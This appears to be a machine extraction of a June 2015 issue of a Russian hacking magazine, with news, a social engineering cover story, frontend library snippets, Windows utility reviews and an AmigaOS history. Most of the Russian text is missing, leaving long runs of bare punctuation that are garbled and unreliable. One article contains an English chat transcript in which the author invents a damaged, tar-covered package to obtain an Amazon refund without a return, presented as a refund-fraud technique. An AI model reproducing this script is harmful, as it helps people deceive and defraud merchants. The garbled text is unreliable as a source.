4 No. 197 June 2015 Recommended price 630 RUB Cover Story p. 10 Social engineering: theory and practice

Haker062015-myjurnal.ru



  • 06 (197) : 03.06.2015

    . , Windows 95 . - . - . - . - , -. , - .

    , ? , : - 46 800 00 . - . 20 (2) . .

    , - , -. , . , - .

    Stay tuned, stay ][!

    , ][@IlyaRusanen

    [email protected]

    [email protected]

    : [email protected]. : 115280, , . -, . 19, . : : 606400, ., -, . , ., . 13. : , 614111, , . , . , . 26. , (-), 77-56756 29.01.2014 . Scanweb, PL 116, Korjalankatu 27, 45101 Kouvola, . 96 500 . 630 . . . , - , . . - : [email protected]. , , 2015

    PC ZONE [email protected]

    [email protected]

    [email protected]

    ant

    [email protected]

    UNITS

    [email protected]

    UNIXOID SYN/[email protected]

    Dr.

    MALWARE, , PHREAKING

    [email protected]

    X-MOBILEexecbit.ru

    -

    DVD

    ant

    [email protected]

    shop.glc.ru, [email protected]

    ([email protected]) : , 109147, / 50

    PR-

    [email protected]

    [email protected]

    16+

    [email protected]

  • 2015

    197

    004 MEGANEWS

    010

    014

    016

    020 Amazon

    022 Frontend -

    024

    028 FileMaker Pro 14 iOS

    032 Parallels Access 2.5

    034 AmigaOS

    040 , Android- franco.kernel

    044 SQLite root

    050

    051 #8. APK

    052 Easy Hack

    056

    061 Tor:

    066 RSA Conference 2015 IT-

    072 ,

    074 MITM-

    078 WPAD

    082 X-tools

    084 ][-: Internet Security McAfee Total Protection, Microsoft Security Essentials

    090 WIM, CSRSS, EMET, CCMP, EFS, SEHOP, ASLR, KPP, UAC, DEP -1

    094 Carbanak Equation 11

    096 Android

    102 API

    106 CUSTIS DZ Systems

    110

    116 : Debian 8

    122 IDS/IPS Suricata

    126 MS SQL Server

    130 Bro

    136 Razer

    140 FAQ

    144 WWW -

  • Microsoft - Windows 10 , - . - .

    - ,

    Project Spartan. - Edge, - -, . , Spartan , , Microsoft -. , , - E. Internet Explorer, . Microsoft , IE - . IE Windows 10 , - . - . , . , Microsoft , Edge Google Chrome Mozilla Firefox. ,

    , , -. Microsoft Bounty Programs. - 500 15 .

    - -. , , Windows 10 Android iOS, . Microsoft , -, , - , Windows. SDK. Android- Java C++, iOS- - Objective-C.

    -. Microsoft Open Technologies, -, Microsoft Open Source, Linux Windows. Microsoft , - , . , - .

    Meganews

    Mifrill [email protected]

    Internet Explorer

    Edge .

    windows 10 Microsoft

    Microsoft -

    Windows 10

    .

    ,

    -

    Windows 10

    - . -

    200

    Windows 8.

  • oogle , YouTube. , , . YouTube . . -

    ? , . - , . Google -: . , Google . , , .

    , Google YouTube API v2, 2008 . , YouTube API v3. -, API- v2, . Google , - API v2 , 2012 , Google TV, iOS, Blu-ray- Sony Panasonic. -, - XML. , .

    YouTube Google

    g

    Cyclance - , - - Windows,

    . Microsoft, -. Adobe Reader, Apple QuickTime, Apple Software Update, Internet Explorer, Windows Media Player, Microsoft Excel, Symantec Norton Security Scan, AVG Free, BitDefender Free, Comodo Antivirus .

    , , - Redirect to SMB, - 1997 ! Server Message Block. , SMB- , / . Windows API (URLDownloadToFile, URLDownloadToCacheFile, URLOpenStream, URLOpenBlockingStream) HTTP/HTTPS SMB, URL file://1.1.1.1. Microsoft , - TCP 139 TCP 445.

    -- Windows , 18

    C

    , . , , , , . .

    API v2

    , , ,

    Google .

    06 /197/ 2015 5

  • , . - , -

    . - (, ) -. , .

    Computer-Human Interaction Yahoo Labs Bodyprint. Bodyprint , - . , , , -. , Yahoo , , . , . - , - , , .

    Yahoo

    Bodyprint

    .

    -

    ,

    : -

    ,

    99,52%.

    - . WikiLeaks 173 132 2000 30 287 Sony Pictures Entertainment. . Sony. - , .

    RSA Conference - . POS-, - 1990 , . . : 166816 ( Z66816, ). , - , , , , - Verifone.

    166816

    173 132 -, - , . ,

    , - . - , - - , .

    LIVE Plus


  • GitHub . , -

    (Great Canon), - .

    - Citizen Lab, , - GitHub, Greatfire.org, DDoS GitHub. Citizen Lab, , man-on-the-side - . . , GitHub Baidu.

    GitHub Google, Safe Browsing. , -, , . 1 15 2015 , Baidu 3 2015 , 7 . -

    - ,

    TLS, , Google - GitHub.

    . -, 3 6 , IP- 114.113.156.119:56789 -. 14 , d3rkfw22xppori.cloudfront.net. HTTP, HTTPS. 18 *.cloudfront.net , . 25 Cloudfront . GitHub. github.com/greatfire/wiki/wiki/nyt/, github.com/greatfire/ github.com/greatfire/wiki/wiki/dw/.

    JS. 995 1325 . : cbjs.baidu.com (123.125.65.120), eclick.baidu.com (123.125.115.164), hm.baidu.com (61.135.185.140), pos.baidu.com (115.239.210.141), cpro.baidu.com (115.239.211.17), bdimg.share.baidu.com (211.90.25.48), pan.baidu.com (180.149.132.99), wapbaike.baidu.com (123.125.114.15).

    , Google - , : TLS, .

    GitHub

    Loggy GitHub, -, -. , ( 70% ) - 2012 - 2014 .

    Citizen

    Lab ,

    -

    -

    ,

    .


  • , , , - , , . , , ,

    , . 2013 ,

    Minecraft DoS-. - , . - Mojang . , . , 1.6.2. 1.8.3, - - . (blog.ammaraskar.com/minecraft-vulnerability-advisory).

    0x08: Block Placement Packet 0x10: Creative Inventory Action. , , - , 30 . - Java-, ArrayLists, . , , CPU - .

    , -, Mojang .

    ,

    ? Trend Micro Ponemon Institute ,

    , -. 1903 18 .

    , Google - Google Play, , , -

    . - Google Play adware, Android -. : ( - , - ), - , . Adware.MobiDash.2.origin - Adware.MobiDash.1.origin. , -, , .

    , , , , - Google Play, . Android.Toorch.1.origin. -. , , - . , root- , - .

    android-

    Google Play - , 100%

    Minecraft

    , -, ?

    63% .................61% .......53% ..........49% ....................23% - ,

    -

    - -

    - , -, -

    - -

    - ?

    75,8 59,8 55,736,0 29,2 23,5 20,6 16,112,9 12,2

    (GPS)

    $

    ( )


  • , - Nero,

    . WebMoney -

    -... .

    WebRTC, Chrome, Firefox Opera. , -

    : ?

    - . Google eBay, AliExpress

    , - .

    , ( )

    .

    , - , Stack Overflow.

    ,

    , : ru.stackoverflow.com. , ,

    , , . - - 30 .

    ,

    . - - MP3- -. ,

    , - .

    , MP3 - :).

    , Joomla WordPress, - ( WordPress, W3Tech, 23,9% ). . CMS

    . , -, - CMS .

    WordPress : . , , - . WordPress 4.2 , , Klikki Oy. , , - (64 ), , - HTML-. , , . - :

    WordPress Foundation , , - CMS.

    , , , . WP-Super-Cache, HTML - . (XSS). , -. , Sucuri : 8 10 . , .

    . , , , WordPress, - RevSlider, Gravity Forms, FancyBox, WP Symposium MailPoet. WordPress Foundation - .

    WordPress CMS

    , WordPress 4.2,

    . ,

    .


  • -,:-.,-.--.

    ,.

    [email protected]


  • -. , 1906 - . . .,-.

    , --,-..-. ,-.

    . --,- . -.-.

    PwnieExpress.-,,,. X: -,-.- . DEFCON.

    ,,- ( !), . -.-.

    - -.!. USB-.,,,.

    .,,.,?

    , -.,,, -.. . , , , ., . , .

    , -,-.,.-,-.

    -,.,,.

    . ,.,, . , -,- . ,-.

    , , ..!-,,,- , , ,. . - .

    ,-.,,.?. -email,- , -.

    -- . , ,- . ,,-.

    INFO

    - .

    , .

    .

    -

    .


  • .,- Social-EngineerInc., . , -.-, , - . , ,,-.,,.

    ! -. , ,-, . .LinkedIn., ,.-.Twitter.Foursquare- -..

    GlobalDigitalForensics-., Facebook ,.- , :!!-,,-,.

    Keep it simple!,-, .Solutionary,,,-.

    -,.,.--:-. XX.

    , . ,,-,,-.

    -. . -, -.,.-,.,-. ,.

    -, --GeneralDynamicsFidelisCybersecuritySolutions.-.

    - (SSLVPN)- . email :-- . , .,-..

    .60%-.-,-75%.().

    - , ,ComputerSciences Corporation. , -,-. , ,.

    -.,DHS.-,.

    60%-.- 90% .

    WWW

    IDG

    :www.csoonline.com

    :

    is.gd/OtQtwX

    --.,-,--


  • ,,-.

    - . ,-ILOVEYOU2000.- - .BlueCoat,-BainCapital.

    BlueCoat,., .,-.

    ,.- Girlsof the IsraelDefenceForces. ,.

    -.ReverseSE. , - , ., . -, , .

    . -.,-,.-,-.,-. -, .,-.

    ?, - . , - . The SecurityAwareness 25 . . --.-,..-

    :-,, , .

    !-.-,,.- 1200 ,-.

    , - -,-(!)., . - , . -.

    ,-- - , ,.:,- . , , -.-,. -, .,XXI-.

    , .-- . ,.,-.,-.,.,.(!)-.

    : ,- , . .

    ,,-.,-,,.

    , - , . , - , ,.,,,- , ..

    WARNING

    -

    . , -

    , -

    .

    1200-

    ,


  • -.

    ,-.,,.-

    ,..

    [email protected]


  • , -,?,-,.

    ,. , -LinkedIn.-:,()-.:(),-,-.,,,-.,(,)-..

    , .,,-.

    ,- . ,,-(-,)..

    , , , , , .Facebook,Google+,Tumblr(,,,),GoogleImages(),Twitter(),Pinterest,FlickrInstagram(-,),Ask.fm(),Meetup(- ) . , .

    , Foursquare, iCloud (, iCloud ). - .: spokeo.com ;city-data.com ;whitepages.com,,,.

    .--.Maltego,.-.

    Maltego CaseFile. .CaseFile

    , CSV,XLSXLSX.

    Ghostery.-,Maltego . Ghostery ,.

    - , . ,, , .,,,,- . , , , . , , -, . ,.

    . Whois (IP, -). BuiltWith.-,-,SSL,,-JavaScript-.,,.

    ,--,,- -.

    . --Google , (-).

    , - Rivalfox, - : Facebook,Google+, Twitter, Instagram - ( -).FalconSocial, .

    -, -,!

    Maltego

    Ghostery

    WARNING

    -

    . , -

    , -

    .


  • - SQL-. , Advanced Persistent Threat (APT) - , .

    - , -

    .

    [email protected]

    Positive Technologies

    [email protected]


  • , - , - . -

    : , , .

    /READY , , - . ?

    . .

    ? , , - .

    -? , .

    ? -? : , . - - !

    ? ? ? , - - , ?

    ? , , -, . - , .

    : , , , .

    . , - , .

    , , , , , , , . .

    . , . standalone Metasploit. - , - FOCA MALTEGO. , SMTP- - VRFY/EXPN .

    , -. . - ; . - , - !

    , , - , - . . -

    , ( - ) , . - - , .

    /STEADY . .

    . -: , - .

    , , , -. - : -

    ; , -

    . , ;

    , -. , Bad USB, Teensy .

    : , -

    , : , ;

    SMS MMS, - , .

    .

    -

    - . , . -, . , , SSRF

    callback Reverse DNS. . : 100, 90, . , , , , .

    , (- ).

    . , !

    SMTP relay ( ) - .

    , XSS/RCE . . -, .

    . - . , , , , , .

    WARNING

    -

    . , -

    , -

    .


  • : -, , , - . APT .

    , , - : - - .

    , - , - , -. . - : - , , .

    , - . . , -: , , , , .

    , , - . . , , - , - .

    , -. -: , : l i, o 0 . - , , . , - , - . , - , .

    : SMTP- relay. SMTP. - 25/465 sendmail . , , - - : Reflected File Download, Open Redirect, XSS RCE SQLi , HTML . - . - , - .

    : , - . . -! ( HTTP, DNS, ), , ( ), , -, . -

    . , .

    /GO : , - . , ( , ). , - .

    : , . - , .

    , , , - , . - , ( - ). , - , . - , -. , , , - .

    ptsecurity.ru.

    Positive technologies

    WWW

    -

    (blog.didierstevens.com).

    . - - Threatpost. com.

    - ,


  • , -. , .

    / FINISH HIM! - - VPN, RDP, . , .

    Positive Technologies - , - . 2014 , , , -, - , 15%. . , ( ).

    15% ? . .

    ? , - , . - .

    : , , - . , - .

    - ( - , - ). , - . - : , , , . , - . , - : SMS .

    , - . -, .

    84ckf1r3 [email protected]

    - . - , - , . - , , .

    IQ , , - . , - , , , . DDoS- .

    - . - , - .

    - , , : - , - . , , , .

    , - , - . , , - . -, .

    -. - , . - .

    - -

    - . - -, , , (, , - , ), ( - , , -, , - ). - . - , - .

    - : ( - ) , - - , , . - .

    -

    -

    -

    . -


  • - Amazon , - , ,

    .

    Amazon

    Kaimikaimi.ru

    - , - , BlackBank Market. -

    , , , , Amazon.

    . , , Ships from and sold by Amazon.com Fulfilled by Amazon ( - ), 1500 ( - ), - . : , email Amazon, , , , , .

    , -, Deep Web, - , , , .

    , ! , --. - - , - . , -, , .

    ? - , - Amazon. , , . Amazon, VCC (virtual credit card) --, . - Amazon. , . . - .


  • You are now connected to Amazon from Amazon.com.
    Me: Hello, several days ago I've ordered a gift for my friend for his birthday. I've received it, but the order package seems to be damaged.
    Amazon: Hello Bob, thanks for contacting Amazon, my name is Alice. I am so sorry to hear about this. Please allow me a moment to check on this for you, I'll be happy to assist you. May I have the order number you are referring to please?
    Me: Order number is ###-######-#######
    Amazon: I'll be happy to help you with this, but first we would need to go through a quick security verification in order to access your account. May I have the email address, the name and the full billing address on your account please?
    Me: E-mail: #####@hotmail.com; Name: Bob Smith; Address: Sample Street 1150 15, NW Washington DC 20071.
    Amazon: Would you mind if I take a moment to check on this for you? It will take a few minutes.

    , , , - ( , Amazon).

    Amazon: Our best option in this case would be to issue a refund associated with a return. Or a replacement associated with a return. Also I can upgrade to the fastest shipping available.

    , , - , . .

    Me: Sorry, but I can't return the package. It turned out that it was damaged and inside of the box everything is covered with something like black tar, so I threw it away, because it doesn't seem to be normal and can be dangerous.
    Amazon: You can put the whole package in any bigger box and send it back for a full refund.

    - .

    Me: I understand, but I'm saying that I've thrown away the package, because this tar can be dangerous for health. And as I've mentioned before, it was a birthday present for my best friend. I can't wait for a replacement and such stuff, I'd rather try now to buy something at a local store to catch the beginning of the birthday celebration.
    Amazon: OK. I will issue the item refund for you. One moment please.
    Me: Thank you for understanding.
    Amazon: Sorry for waiting, I've requested the refund, you'll see the refund back to your original payment method within 23 business days. I'll also make sure to send you a confirmation regarding today's solution.
    Me: Thank you!
    Amazon: You are very welcome! Is there anything else I could help you with today?

    ! . , - , , .

    , , - , .

    , - , . , Amazon - - .

    , : ( - ) , , - ( -, ).

    ? , , , , , , . Amazon , - . , , , , , , .

    ,

    -

    -

    Amazon

    WARNING

    -

    . , -

    , -

    .


  • Frontend -

    ipestov.com

    ExpandJS

    www.expandjs.com , -, . - . , -, HTML-, .

    ExpandJS. -, 80 - 350 JavaScript- . Material Design, .

    :

    Form factor: {{type}}
    Mobile device: {{mobile ? 'yes' : 'no'}}

    :

    ... ... ... ...

    Ramjet

    https://github.com/rich-harris/ramjet , - - . SVG, DOM- - . Ramjet - easing- -:

    a

    b

    // to repeat, run this from the console!
    ramjet.transform( a, b );

    , - , . GitHub , - -. , .

    Electron

    electron.atom.io NativeScript React Native - -. Electron, - HTML, CSS JavaScript. Electron, Atom Shell, GitHub. , , , - . io.js Chromium. , - Atom, - , Docker, Slack, Facebook, Microsoft. , : Electron Windows-.

    jQuery.my

    https://github.com/ermouth/jQuery.my jQuery.my - . - , , . jQuery.my jQuery UI, Select2, CodeMirror, Ace, Redactor, CLeditor, jQuery Mobile .

    var data = { name: "Luke Skywalker", age: 46 };
    $("#form").my({ ui: { "#name": "name", "#age": "age" } }, data);


  • Playcanvas

    https://playcanvas.com/ . -, Playcanvas JavaScript c WebGL 3D , -, Maya, 3ds Max, Blender. -, . - -, - GitHub.

    // Create a PlayCanvas application
    var canvas = document.getElementById("application-canvas");
    var app = new pc.Application(canvas, {});
    app.start();

    // Fill the available space at full resolution
    app.setCanvasFillMode(pc.FILLMODE_FILL_WINDOW);
    app.setCanvasResolution(pc.RESOLUTION_AUTO);

    // Create box entity
    var cube = new pc.Entity();
    cube.addComponent("model", { type: "box" });

    // Create camera entity
    var camera = new pc.Entity();
    camera.addComponent("camera", { clearColor: new pc.Color(0.1, 0.1, 0.1) });

    // Create directional light entity
    var light = new pc.Entity();
    light.addComponent("light");

    // Add to hierarchy
    app.root.addChild(cube);
    app.root.addChild(camera);
    app.root.addChild(light);

    // Set up initial positions and orientations
    camera.setPosition(0, 0, 3);
    light.setEulerAngles(45, 0, 0);

    // Register an update event
    app.on("update", function (deltaTime) {
        cube.rotate(10 * deltaTime, 20 * deltaTime, 30 * deltaTime);
    });

    Clusterize.js

    https://github.com/NeXTs/Clusterize.js . - 500 - . Clusterize . - , - -, . : WebKit/Blink 134 217 726 px; Gecko 10 737 418 px; Trident 17 895 697 px.

    // JavaScript
    var data = ['', '', /* ... */];
    var clusterize = new Clusterize({
        rows: data,
        scrollId: 'scrollArea',
        contentId: 'contentArea'
    });

    Globalize

    https://github.com/jquery/globalize , - Node.js . Globalize , . Unicode CLDR JSON, i18n.

    Vault

    https://github.com/hashicorp/vault , - Go. Vault , , , API . API : HSMs, AWS IAM, SQL . - , , - , , Vault.

    Egg.js

    thatmikeflynn.com/egg.js , , - . UX- . , Egg.js , - .

    var egg = new Egg();
    egg
      .addCode("up,up,down,down,left,right,left,right,b,a", function() {
        jQuery('#egggif').fadeIn(500, function() {
          window.setTimeout(function() { jQuery('#egggif').hide(); }, 5000);
        });
      }, "konami-code")
      .addHook(function() {
        console.log("Hook called for: " + this.activeEgg.keys);
        console.log(this.activeEgg.metadata);
      })
      .listen();

    JSON Server

    https://github.com/typicode/json-server -, - JSON. - REST API .

    db.json:

    {
      "posts": [
        { "id": 1, "title": "json-server", "author": "typicode" }
      ],
      "comments": [
        { "id": 1, "body": "some comment", "postId": 1 }
      ]
    }

    JSON-:

    $ json-server --watch db.json

    localhost:3000/posts/1, :

    { "id": 1, "title": "json-server", "author": "typicode" }


  • . . ,

    -.

    bonumopus@shutterstock.com

    [email protected]

    WARNING

    - - . ,

    .

    WWW

    SysInternals

    73 :is.gd/DuTDyN

    NirSoft 56 :is.gd/GmkDwW

    AVZ:z-oleg.com


  • Autoruns Winternals Software ( - Sysinternals.com), Microsoft. - - , - Microsoft. - 13.3 2015 . v.13.0 , , -, .

    Autoruns . - -, ( ) . - Windows, , - , .

    , - Microsoft, , . - , .

    - . Autoruns , .

    . - , . (is.gd/0TQ6Ye), :

    autorunsc -a blt -vrs -vt > C:\Autor.log

    autorunsc , . -a , . : b boot execute ( , -), l logon, - t . blt (*), .

    -vrs -vt VirusTotal.

    , Microsoft . , - . , - VirusTotal - .

    Autorunsc ( ), -. -. UCS-2 Little Endian. - :

    HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
    Adobe ARM
    "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
    Adobe Reader and Acrobat Manager
    Adobe Systems Incorporated
    1.801.10.4720
    c:\program files (x86)\common files\adobe\arm\1.0\adobearm.exe
    20.11.2014 21:03
    VT detection: 1/56
    VT permalink: (VirusTotal link)

    Autoruns : is.gd/0TQ6Ye.

    Autoruns

    , VT


  • - , . - - .

    Process Explorer Autoruns Process Explorer (PE). PE, Autoruns, - .

    PE : - . , - ( ) VirusTotal. , . , -, .

    , . - , , , - /, . - . , . , () . .

    PE . - . , - VirusTotal, , (suspend) -. - ( ), -. , Process Explorer (resume). -, , -. BIOS/UEFI, .

    - , -. - , - . Process Explorer . , , . PE .

    Process Explorer, - ( ) Debugging Tools for Windows. (is.gd/flp0WS) Windows Driver Kit (is.gd/TURLrM). Process Explorer Microsoft (is.gd/VR6CwF).

    , Torrent Process Explorer

    - Safari

    Unlocker , Windows, . . , -, (Cedrick Collomb). Unlocker : - , . 2013 , - . , - , index.dat, Windows .

    Unlocker , - . .


  • . , .

    . AVZ ( ) .

    . Unlocker, AVZ Boot Cleaner. , Windows . , , .

    AVZ -. NTFS , - Microsoft . , - HackTool. - , - . AVZ - .

    AVZ -, .

    - , . .

    AVZ AVZ, , . , - -. , , - , , SPI Winsock , .

    - . AVZ , , , - . AVZ - .

    AVZ , - , AVZPM . - , , - .

    AVZGuard , AVZ. ,

    AVZ

    Unlocker ,

    , -.

    , . Unlocker , - . - Win32 API, : -, .

    , . Unlocker .

    1.9.0 64- Windows. - . Unlocker Assistant. - Unlocker , - . -h

    AVZ


  • FileMaker Pro 14 iOS

    [email protected]

    Frannyanne@shutterstock.com


  • Microsoft Access . . ,

    , , . , , - . -, Access FileMaker Pro 14.

    Access, FileMaker Pro - , ( , . , , FileMaker Server). FileMaker Pro , .

    , , - (, , Windows 8 OS X 10.10) . , - .

    FileMaker , Access, -. . - MS-DOS, . Apple , FileMaker . , Microsoft - . Access - .

    FileMaker . - , - Mac OS. FileMaker Pro - , OS X ( Windows, , ). , - , : , - . FileMaker Pro , .

    Access -, , - , FileMaker Pro -

    . - , . FileMaker Pro -, .

    - iOS. FileMaker Pro , iPhone iPad. , , , - . , , FileMaker Pro - .

    FileMaker Pro 14. - (Layout) , , -. FileMaker Pro Access. , . - , -. ,

    FileMaker Pro 14

    .

    Windows

    FileMaker Pro 14

    data-driven . Microsoft Access, - . FileMaker , -. iOS.


  • , , PDF.

    , (Browse), - . - FileMaker Pro , , .

    . (Find) -, , , - .

    , , . - Manage, . Manage Database, - : Tables, Fields Relationships. , , , . , , , .

    CRM - . , . , - : , .

    , : Calculation Summary. , , -, . Options - , , , .

    Relationships , (foreign keys), , - FileMaker Pro, (match fields). - : - , - , . - , .

    Manage Database, , FileMaker Pro -: . , : . -, . .

    - . , , .

    . FileMaker Pro - , . ( , ) . iPad, Enlightened Touch. - , .

    . , , - , , . , , , - , . - .

    - . ( ) ( , ). - : , - , - .

    , . : - . .

    -

    .

    -

    ,

    .

    ,

    -

    . -

    -

    .

    FileMaker Pro 14


  • , -.

    . , . - , . . - , - . - , . .

    . ( , - , ) - iPad. (File / Share with FileMaker Pro Clients), -.

    , - iOS, - , , , , .

    - - c . , - .

    , - , - . . - : , -.

    -, . FileMaker Pro , , , . - , , , - , . ?

    -. , ( - ). : , -. , FileMaker Pro , : - = ::. !

    . : - FileMaker Pro. - , - , . .

    , -

    -

    iPad


  • - -, Parallels Access . - , - . - .

    Parallels Access 2.5

    , Parallels Access, , -. OS X VNC, - ,

    - . , ?

    Parallels -, . - , ( Windows). - - .

    , Parallels Access ( iOS, Android). ,

    , . . , , - , , - -, ( , - , , ).

    , -. : , , -, Launchpad. , , . : . Access , .

    [email protected]

    .

    ,


  • ? : -, , Photoshop, - . - . - . Photoshop , .

    Parallels Access - . 443- (HTTPS), . - Parallels , , IP- - . Parallels Access access.parallels.com, - .

    , Parallels Access . - 650 . , , - , .

    , Parallels Access . - , - , . , .

    , - Parallels Access . - - , . Parallels Access , - . , . , , , , - . , , , - .

    - , . : , Launchpad, , . Parallels Access.

    . , Parallels Access - , , . - iOS Android: .

    , - . - , . -, , Windows Finder - . : . , . Parallels Access - .

    , - Parallels Access -. . - ! , Parallels Access . . , World of Warcraft, : , - , -. , . , -, VNC.

    , Parallels Access . , -

    , !

    ,

    Photoshop -

    !

    ,

    -

    -

    , -


  • Amiga Corporation. - . -: , . , -

    - .

    Amiga Corporation . (Jay Miner), Atari. - 8- , Atari 2600 Atari 400/800. Atari , - , , - , .

    - . - , Motorola 68000, Atari --, , , .

    (David Shannon Morse) - Tonka Toys, . - Lorraine ( ) - .

    - 32- Motorola 68000. , , - - - . Motorola 68k Apollo Apple Macintosh . , - - . Lorraine , Apple Macintosh, ( ).

    Lorraine - . , --

    1985 Commodore Amiga AmigaOS. - -, -. , .

    AmigaOS


  • , - - , . (DMA), - , -. ? , - ( 640 256 4096 ) ( - ) Dual Playfield ( - -), c . - 8- - 14- .

    Lorraine 1983 - . - CES - . - Boing Ball , Amiga, AmigaOS.

    Lorraine - , OCS Original Chip Set. : Agnus DMA, - ( 2D-), Denise , - , Paula . - , - Lorraine. , , Atari, - Lorraine 16- Atari ST, Commodore, -. Commodore - Commodore Amiga 1000 - Motorola 68000 OCS.

    AmigaOS. OCS - Amiga 1000 , , , , Commodore - . NTSC PAL - .

    . - AmigaOS, Amiga 1000,

    Agnus, Denise Paula. , , . software engineers (R. J. Mical), (Dale Luck) (Carl Sassenrath).

    OCS. CES Boing Ball , -

    -

    Lorraine

    Blitter Copper

    Agnus

    Dual Playfield

    -

    -

    ,

    ,

    Amiga. -

    AmigaOS

    Amiga

    OCS

    Agnus, Denise

    Paula -

    Commodore

    Semiconductor Group


  • . - Motorola 68000 - Blitter Copper Agnus. - .

    Amiga 1000. - . UNIX- - . , - . ( , - !), , - .

    : - , . (runtime libraries) , . - - Exec , - AmigaOS, -, , - , - ... . SassenRanch : Exec AmigaOS .

    runtime- Amiga 1000 -, Exec. , - Commodore. graphics.library intuition.library , - .

    . Agnus Denise graphics. - OCS, , , graphics.library . - intuition.library - , , . - intuition Amiga Graphicraft, Musicraft Textcraft.

    1985 Commodore Amiga 1000 ( . - : ) Commodore

    , . , - AmigaOS ( ) - , Commodore MetaComCo, - TRIPOS - (DOS), - , Motorola 68000. AmigaOS - . - TRIPOS . TRIPOS dos.library. AmigaOS : TRIPOS BCPL (Basic Combined Programming Language) , (, - Hello, World BCPL).

    AmigaOS dos.library - . Exec dos.library runtime-, - . , dos.library, . dos.library, ,

    AmigaOS

    -

    ,

    -

    AmigaOS

    Exec

    1985-

    NT-

    Windows

    AmigaDOS -

    INFO

    AmigaOSRAMdrive.-

    -.(PerryKivolowitz),Amiga,-.RRD(RecoverableRAMDisk)RAMdrive,

    reboot.


  • AmigaDOS , - AmigaOS.

    , AmigaOS . Motorola 68000, , - MMU (Memory Management Unit), - . , . -, . AmigaOS , . Guru meditation , AmigaOS .

    AmigaDOS runtime- , Exec , - , , , . - ( -) devices.

    , AmigaDOS trackdisk.device, floppy- (, , scsi.device). intuition input.device, , -, keyboard.device, serial.device gameport.device. AmigaDOS intuition console.device.

    Kickstart, Workbench. , 2, - AmigaOS . -- Kickstart. PC - BIOS IPL. - Autoconfig. - . , - , . PCI plug and play, , - Autoconfig.

    - - Exec. , AmigaOS, - (0000$

    AmigaOS Exec -

    ,

    WWW

    AmigaOS Hyperion Entertainment: www.amigaos.net

    -

    Amiga:www.amigahistory.co.uk

    AmigaOS-

    :aminet.net

    Amiga:ada.untergrund.net

    LorraineCES

    1984: https://www.youtube.com/watch?v=nLcpn1_IY1A

    Shareware MUI:

    www.sasg.com/mui/

    opensource-AROS:

    aros.sourceforge.net

    MorphOS:

    morphos.de

    , -

    -

    Kickstart ROM-

    -

    Amiga Workbench

    ,

    Boing Ball

    craft

    Graphicraft

    Textcraft

    Workbench


  • 0004), SysBase, Exec. , Exec - devices, - runtime , . , , , - . - Exec , , - . , - .

    Amiga, 3,5- , Kickstart - AmigaOS . - ROM, Kickstart. AmigaOS - Kickstart.

    - , Amiga softkickers, - Kickstart. , , - ( ), - .

    AmigaOS , intuition, AmigaDOS - . - - !

    - Insert Amiga Workbench. , Workbench, , -... , , , , , (), - ( ) crafts (). , , . Workbench Finder Apple Macintosh GEM, - CP/M Atari ST.

    , . , 1.0 Workbench . , , . Workbench ,

    AmigaOS , Amiga Workbench.

    Workbench - . Workbench , GUI - .

    - Amiga AmigaOS. (Stefan Stuntz) - MUI (Magic User Interface), AmigaOS -.

    AmigaOS. , - , - AmigaOS, IBM PC? - Commodore . - , Amiga, -, - . , .

    Commodore PC. , OCS , . Motorola - Intel, ECS (Enhanced Chip Set) Super Agnus Super Denise .

    - - . OCS AGA (Advanced Graphic Architecture) 262 , . Amiga 1200 Amiga 4000 AGA NTSC PAL - - . , - -5 - .

    AmigaOS - . - MS-DOS , Windows . -

    -

    MUI

    -

    Workbench

    INFO

    2001-Amiga.:,,Amiga3000.3D-VistaPro,-

    -

    .

    INFO

    Workbench1.2-.,

    -AltShift-F1-SystemSoftware:Carl,Neil&Kodiak.

    F2

    :GraphicsSoftware:Dale,

    Bart,Jim&=RJ=.


  • , NT AmigaOS: Executive - DLL-.

    Commodore, AmigaOS - , - . , : Amiga , .

    Amiga AmigaOS, - . 2005 AmigaOS, PowerPC. Hyperion Entertainment, AmigaOne, - , PowerPC - Pegasos II.

    AmigaOS 4.x - Amiga, AROS (Amiga Research Operating System) . AROS

    AmigaOS, 3.1 API. AROS - , AmigaOS, Commodore Amiga. , . Macintosh Operating System, Motorola PowerPC, Intel UNIX BSD. AROS AmigaOS - Intel x86-64, Motorola 68k PowerPC, - Linux, FreeBSD Windows host-. AROS - Zune MUI - .

    AmigaOS MorphOS. Phase5 Digital Products, (turbo-), Amiga. (Ralph Schmidt) (Frank Mariak), PowerPC. - -. , AmigaOS - , AmigaOS, - . - . MorphOS Quark, - (boxes).

    , ( ) MorphOS, A-Box , - ( ) AmigaOS. Q-Box, , - , OS X FreeBSD, PowerPC.

    , , , - AROS MorphOS, - , Amiga . - . , . , , , - . , , - . - AmigaOS.

    Open source

    AROS -

    AmigaOS,

    MorphOS

    AmigaOS -

    .

    Quark

    MorphOS -

    MUI -

    . AROS,

    Zune


  • (Francisco Franco) - Android-, - franco.kernel Nexus FKUpdater. -, - - , - - .

    , Android- franco.kernel

    androidstreet.net

    BRADA

    [email protected]


  • , , Nexus, . , - , , , franco.kernel , , . , - franco.kernel - - Nexus .

    , , , - , - , . .

    . -5 - , - ?1. , .2. - -

    . .

    3. .4.

    .5. .

    , . . , , - Android.

    --: - CloudCar, Android Auto, 2014 - 2014 .

    , Linux - . - Android LG P500. - , /sys /proc, - .

    Android 2.2, - . Dalvik RAM-, - . Dalvik , . , - Dalvik /cache .

    , , -

    -

    , : - Linux- Android- , -, -, . - ( ) , , franco.kernel.

    CPU

    FKUpdater: CPU GPU


  • , -. , Linux- , - - , . -.

    Huawei X5. Qualcomm high end , 800 2000 . -, Nexus S, Galaxy Nexus. - FKUpdater. -, .

    ? , - - (governor) - ( ). - - . - (, ), .

    , , - Nexus 6. 1,5 , -. , . , - . .

    ? -, Interactive Conservative 10 (0,01 ), - . , - 1,7 , , 40 (0,04 ). , 40 - , - ( 60 16 ).

    , MPDecision. - .

    , Conservative?

    Interactive Conservative. , , Google, - Qualcomm ( - Snapdragon 805). -, , Conservative, , Ondemand, - .

    InteractiveX, - leanKernel, ?InteractiveX Interactive - ( ). , , - Interactive Ondemand . -, , .

    . - ? . - . - , X Y , .

    , - , ? ?, , doubleTapToWake (- . . .) / , - - . , doubleTapToWake - , One Plus One Nexus 6, (, ).

    , , Linux. - , - , .

    CyanogenMod? CM, - , , , - . , Nexus 7 2012 , Nexus 5 6, , CM. Nexus 4 Nexus 7 2013 , - CyanogenMod.

    Android ? -? userspace-, , Android ( ).

    --,,-InteractiveOndemand

    ,---MPDecision


